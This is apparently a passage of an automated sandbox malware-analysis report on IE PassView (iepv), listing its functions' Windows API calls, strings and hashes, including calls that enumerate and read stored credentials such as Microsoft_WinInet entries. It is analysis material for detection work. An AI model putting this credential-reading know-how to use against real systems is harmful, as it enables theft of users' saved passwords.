                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,0000000C), ref: 00403095
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,0000000C), ref: 004030A8
                                        • memcpy.MSVCRT(?,00000004,-000000F4,?,?,0000000C), ref: 004030EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpy$FreeLocalwcschr$memsetwcscpywcslenwcsncmp
                                        • String ID: Microsoft_WinInet
                                        • API String ID: 121219126-2056801976
                                        • Opcode ID: 31339bb1bfd41b7cda9937e0eb12282c12b3f69bb2134050ca348a437243ed26
                                        • Instruction ID: 740406e3f86503c8a0d7b7516b21f816cafa52995530843ae5346f6235719748
                                        • Opcode Fuzzy Hash: 31339bb1bfd41b7cda9937e0eb12282c12b3f69bb2134050ca348a437243ed26
                                        • Instruction Fuzzy Hash: FA91F8B1D002199BDF10DF94D944ADEBBB8FF08304F108576E919FB281E778AA45CB99
                                        Function 0040C042 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C173,0040BDC4), ref: 0040C051
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C06A
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040C07B
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040C08C
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040C09D
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040C0AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        • Opcode ID: 1cb7c79e6c559eeea0141376727ce9c35e81f11d5fdf0e22e2ba3d11b968f958
                                        • Instruction ID: 7eeed2c357a9b3532822de87abd471f84b8860815f5170c185e05fe0bb6bf640
                                        • Opcode Fuzzy Hash: 1cb7c79e6c559eeea0141376727ce9c35e81f11d5fdf0e22e2ba3d11b968f958
                                        • Instruction Fuzzy Hash: 8FF08671521312E9C3208B65EDC0FA729A45B44B44714813BA900F22E4DBBC8903CB7D
                                        Function 00402978 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004029F3: FreeLibrary.KERNEL32(?,00402980,?,00401F1F), ref: 004029FA
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00401F1F), ref: 00402985
                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040299E
                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 004029AA
                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 004029B6
                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 004029C2
                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004029CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                        • API String ID: 2449869053-4258758744
                                        • Opcode ID: 06c9b524b776e8bba2dc149e1e975119917217e63118d0c7b498b9a8cd73550f
                                        • Instruction ID: 003e764b07dd5b06db3ac3cec127ba167f7bc96d71fea6526835b1c56324d332
                                        • Opcode Fuzzy Hash: 06c9b524b776e8bba2dc149e1e975119917217e63118d0c7b498b9a8cd73550f
                                        • Instruction Fuzzy Hash: 1A0104B06007009ADB706F7ADD49B07BAE0AB94700B208D3EE095B36D0D6BAA450DB99
                                        Function 0040A15F Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 78windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A195
                                          • Part of subcall function 004053D7: LoadCursorA.USER32(00000000,00007F02), ref: 004053DE
                                          • Part of subcall function 004053D7: SetCursor.USER32(00000000), ref: 004053E5
                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A1B8
                                          • Part of subcall function 0040A0CE: sprintf.MSVCRT ref: 0040A0F4
                                          • Part of subcall function 0040A0CE: sprintf.MSVCRT ref: 0040A11E
                                          • Part of subcall function 0040A0CE: _mbscat.MSVCRT ref: 0040A131
                                          • Part of subcall function 0040A0CE: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A157
                                        • SetCursor.USER32 ref: 0040A1DD
                                        • SetFocus.USER32(?), ref: 0040A1EF
                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A206
                                        • memset.MSVCRT ref: 0040A21B
                                        • _mbscpy.MSVCRT(?,IE PassView,?,00000000,000003FF), ref: 0040A22D
                                        • sprintf.MSVCRT ref: 0040A254
                                        • SetWindowTextA.USER32(?,?), ref: 0040A269
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursorsprintf$FocusLoadTextWindow_mbscat_mbscpymemset
                                        • String ID: %s: %s$IE PassView
                                        • API String ID: 1200602740-2840194521
                                        • Opcode ID: f5094cf0edf700bc7def1687272bd8d92ce36bb861bbd2c298eabee37231295e
                                        • Instruction ID: 69b561ab783facfea62e5cba01b3acbb02d59bb2afa0ca916c4815844b62d3a1
                                        • Opcode Fuzzy Hash: f5094cf0edf700bc7def1687272bd8d92ce36bb861bbd2c298eabee37231295e
                                        • Instruction Fuzzy Hash: 45217F71500208AFD721AB65CC85FAA77EDFF48308F0504B9F619A72A2D6B4AD158F25
                                        Function 00407EA8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • _mbscpy.MSVCRT(004120F0,?), ref: 00407EC0
                                        • _mbscpy.MSVCRT(004121F8,general,004120F0,?), ref: 00407ED0
                                          • Part of subcall function 00407A83: memset.MSVCRT ref: 00407AA8
                                          • Part of subcall function 00407A83: GetPrivateProfileStringA.KERNEL32(004121F8,?,0040E470,?,00001000,004120F0), ref: 00407ACC
                                          • Part of subcall function 00407A83: WritePrivateProfileStringA.KERNEL32(004121F8,?,?,004120F0), ref: 00407AE3
                                        • EnumResourceNamesA.KERNEL32(?,00000004,Function_00007CD1,00000000), ref: 00407F06
                                        • EnumResourceNamesA.KERNEL32(?,00000005,Function_00007CD1,00000000), ref: 00407F10
                                        • _mbscpy.MSVCRT(004121F8,strings), ref: 00407F18
                                        • memset.MSVCRT ref: 00407F34
                                        • LoadStringA.USER32(?,00000000,?,00001000), ref: 00407F48
                                          • Part of subcall function 00407AF1: _itoa.MSVCRT ref: 00407B12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                        • API String ID: 1035899707-3647959541
                                        • Opcode ID: 9582e2341051d6afeeacc9c98517bbee12d68174111ea14a9c12043bc1ce11b7
                                        • Instruction ID: 2cc56ae5bfb681f20954fdcfb62fedc6d740c0835c2d5c41f08e15392501c071
                                        • Opcode Fuzzy Hash: 9582e2341051d6afeeacc9c98517bbee12d68174111ea14a9c12043bc1ce11b7
                                        • Instruction Fuzzy Hash: 6E11E231E0425836D72167578C46FDF3E2CDB85754F00447AFA08B61C1D6B8A99096AD
                                        Function 0040B423 Relevance: 18.2, APIs: 12, Instructions: 151windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 0040B49F
                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040B4AD
                                        • SelectObject.GDI32(?,?), ref: 0040B4C2
                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B4F6
                                        • SelectObject.GDI32(00000014,00000005), ref: 0040B502
                                          • Part of subcall function 0040B283: GetCursorPos.USER32(?), ref: 0040B290
                                          • Part of subcall function 0040B283: GetSubMenu.USER32(?,00000000), ref: 0040B29E
                                          • Part of subcall function 0040B283: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B2CC
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040B51D
                                        • LoadCursorA.USER32(00000000,00000067), ref: 0040B526
                                        • SetCursor.USER32(00000000), ref: 0040B52D
                                        • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B54F
                                        • SetFocus.USER32(?), ref: 0040B58C
                                        • SetFocus.USER32(?), ref: 0040B603
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrack
                                        • String ID:
                                        • API String ID: 3230168590-0
                                        • Opcode ID: 4b215ba68ed7b2943b3bcb7948ba68023ff3924a7fe48d001ac839e9ebb3db4f
                                        • Instruction ID: 99d967e87b218d81e884191810209c469c196458d5d678120bee531a69c10094
                                        • Opcode Fuzzy Hash: 4b215ba68ed7b2943b3bcb7948ba68023ff3924a7fe48d001ac839e9ebb3db4f
                                        • Instruction Fuzzy Hash: F4518B71210205FFCB19AF65CC85AAA77A6FF08304F10057AF915BB2E1C7789D618B9E
                                        Function 00407CD1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 86windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • sprintf.MSVCRT ref: 00407CF2
                                        • LoadMenuA.USER32(?,?), ref: 00407D00
                                          • Part of subcall function 00407B29: GetMenuItemCount.USER32(?), ref: 00407B3E
                                          • Part of subcall function 00407B29: memset.MSVCRT ref: 00407B5F
                                          • Part of subcall function 00407B29: GetMenuItemInfoA.USER32 ref: 00407B9A
                                          • Part of subcall function 00407B29: strchr.MSVCRT ref: 00407BB1
                                        • DestroyMenu.USER32(00000000), ref: 00407D1E
                                        • sprintf.MSVCRT ref: 00407D62
                                        • CreateDialogParamA.USER32(?,00000000,00000000,00407CCC,00000000), ref: 00407D77
                                        • memset.MSVCRT ref: 00407D93
                                        • GetWindowTextA.USER32(00000000,?,00001000), ref: 00407DA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemsetsprintf$CountCreateDestroyDialogInfoLoadParamTextWindowstrchr
                                        • String ID: caption$dialog_%d$menu_%d
                                        • API String ID: 3071497004-3822380221
                                        • Opcode ID: 5a66b78d936a9636a50b2df3c6b14f3a71b0e6aad9caa070ae913f33758c7392
                                        • Instruction ID: 32cde7b292886ced11312a8859e5682abc8fd63b29569244e5c63d3dce261f88
                                        • Opcode Fuzzy Hash: 5a66b78d936a9636a50b2df3c6b14f3a71b0e6aad9caa070ae913f33758c7392
                                        • Instruction Fuzzy Hash: 7621F072908148BBDB12AF51DD82EEF3B28EF04305F10447AFA05B11D1D2B86DA48B6B
                                        Function 0040C189 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strchr.MSVCRT ref: 0040C1A1
                                        • _mbscpy.MSVCRT(?,-00000001), ref: 0040C1AF
                                          • Part of subcall function 0040559B: strlen.MSVCRT ref: 004055AC
                                          • Part of subcall function 0040559B: strlen.MSVCRT ref: 004055B4
                                          • Part of subcall function 0040559B: _memicmp.MSVCRT ref: 004055CE
                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040C1FD
                                        • _mbscat.MSVCRT ref: 0040C208
                                        • memset.MSVCRT ref: 0040C1E4
                                          • Part of subcall function 00405990: GetWindowsDirectoryA.KERNEL32(00412498,00000104,?,0040C23D,00000000,?,00000000,00000104,00000104), ref: 004059A5
                                          • Part of subcall function 00405990: _mbscpy.MSVCRT(00000000,00412498,?,0040C23D,00000000,?,00000000,00000104,00000104), ref: 004059B5
                                        • memset.MSVCRT ref: 0040C22C
                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040C247
                                        • _mbscat.MSVCRT ref: 0040C252
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                        • String ID: \systemroot
                                        • API String ID: 912701516-1821301763
                                        • Opcode ID: 28e342fe43c589a554c1bdb2e0c9192c7fa84f8ecc5dbd125d1132d364fc6ec5
                                        • Instruction ID: 31fdd45b3f5b781b88274249cf185fd0dc6b0352b0ceb64147351386182b16e6
                                        • Opcode Fuzzy Hash: 28e342fe43c589a554c1bdb2e0c9192c7fa84f8ecc5dbd125d1132d364fc6ec5
                                        • Instruction Fuzzy Hash: 9B21FC75D0C304B9E724A3E54CC6FEB629C8B15718F5001BFF588B10C2EABCA989462A
                                        Function 00404C2B Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 53libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00404C42
                                        • GetWindow.USER32(?,00000005), ref: 00404C5A
                                        • GetWindow.USER32(00000000), ref: 00404C5D
                                          • Part of subcall function 004015AB: GetWindowRect.USER32(?,?), ref: 004015BA
                                          • Part of subcall function 004015AB: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D5
                                        • GetWindow.USER32(00000000,00000002), ref: 00404C69
                                        • GetDlgItem.USER32(?,000003F3), ref: 00404C80
                                        • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00404C8D
                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00404C9B
                                        • FreeLibrary.KERNEL32(00000000), ref: 00404CAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$LibraryRect$AddressClientFreeItemLoadPointsProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 846015027-1506664499
                                        • Opcode ID: 36ec189a37b580cd799c7a60beba3737f9fbc182b0de0dcf69686658c0bb9726
                                        • Instruction ID: b61f9ae83d5cca416fac4a59b24ed0b9e7d361c88adb564d1af762a7c04d9879
                                        • Opcode Fuzzy Hash: 36ec189a37b580cd799c7a60beba3737f9fbc182b0de0dcf69686658c0bb9726
                                        • Instruction Fuzzy Hash: 2D01B5312002057FE6119B359D49FBA73ACEF85755F11083AF905B71D0DBB8DD015769
                                        Function 004065C1 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402978: LoadLibraryA.KERNEL32(advapi32.dll,?,00401F1F), ref: 00402985
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040299E
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredFree), ref: 004029AA
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 004029B6
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 004029C2
                                          • Part of subcall function 00402978: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004029CE
                                        • wcslen.MSVCRT ref: 00406620
                                        • wcsncmp.MSVCRT ref: 00406660
                                        • memset.MSVCRT ref: 004066D5
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 004066F1
                                        • wcschr.MSVCRT ref: 0040673A
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406760
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                        • String ID: J$Microsoft_WinInet$`$A
                                        • API String ID: 3318079752-302353289
                                        • Opcode ID: b3a9a8d235073bd91423286e9e58227929cd420a36e91ea677f96a6faedbe12a
                                        • Instruction ID: 13115e57eacac97305432b5338aa4cb26e2fe695d4be64bdc8d3037ecd813aa8
                                        • Opcode Fuzzy Hash: b3a9a8d235073bd91423286e9e58227929cd420a36e91ea677f96a6faedbe12a
                                        • Instruction Fuzzy Hash: F851F7B1D002199FDB20DFA5C9849DEBBB8FF08304F10447AE91AF7251E738AA558F55
                                        Function 00407692 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                        • String ID: 0$6
                                        • API String ID: 3540791495-3849865405
                                        • Opcode ID: 20bfde9252d4a6a922594ac7fd5134ffd5a44a80bc224ad0560f6bf294b11654
                                        • Instruction ID: ed4fa9e8ece2ba155e03ffd584b4ec770fb82937e298684def76ac4131db59b7
                                        • Opcode Fuzzy Hash: 20bfde9252d4a6a922594ac7fd5134ffd5a44a80bc224ad0560f6bf294b11654
                                        • Instruction Fuzzy Hash: A931A072808344AFD7109F91C84099BBBE9EB84354F14493FF598A2291D375E948CF5B
                                        Function 00407DE3 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405759: GetFileAttributesA.KERNELBASE(?,00403409,?,?,?,?,00000000,00402C40,?), ref: 0040575D
                                        • _mbscpy.MSVCRT(004120F0,00000000,?,00000000,00407EA2,00000000,?,00000000,00000104), ref: 00407DFD
                                        • _mbscpy.MSVCRT(004121F8,general,004120F0,00000000,?,00000000,00407EA2,00000000,?,00000000,00000104), ref: 00407E0D
                                        • GetPrivateProfileIntA.KERNEL32(004121F8,rtl,00000000,004120F0), ref: 00407E1E
                                          • Part of subcall function 004079EF: GetPrivateProfileStringA.KERNEL32(004121F8,?,0040E470,00412248,?,004120F0), ref: 00407A0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                        • String ID: H"A$TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 888011440-4106476969
                                        • Opcode ID: 20c7f670c4fbee4d165d537278dfbdf08a460d4d7532e0875e449b3bfd7cc637
                                        • Instruction ID: 66dd985f3f0e7778c3bccbbe20648230d46ea4180a27e3b7362807e5d014d099
                                        • Opcode Fuzzy Hash: 20c7f670c4fbee4d165d537278dfbdf08a460d4d7532e0875e449b3bfd7cc637
                                        • Instruction Fuzzy Hash: 58F0C231E8821232E22132279D03F6F35149B92B14F05887BB804BB2C2CAFC6830929E
                                        Function 00403A7B Relevance: 15.2, APIs: 10, Instructions: 151COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405476: CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        • GetFileSize.KERNEL32(00000000,00000000,000000D0,?,00000000), ref: 00403AA2
                                        • memset.MSVCRT ref: 00403ACA
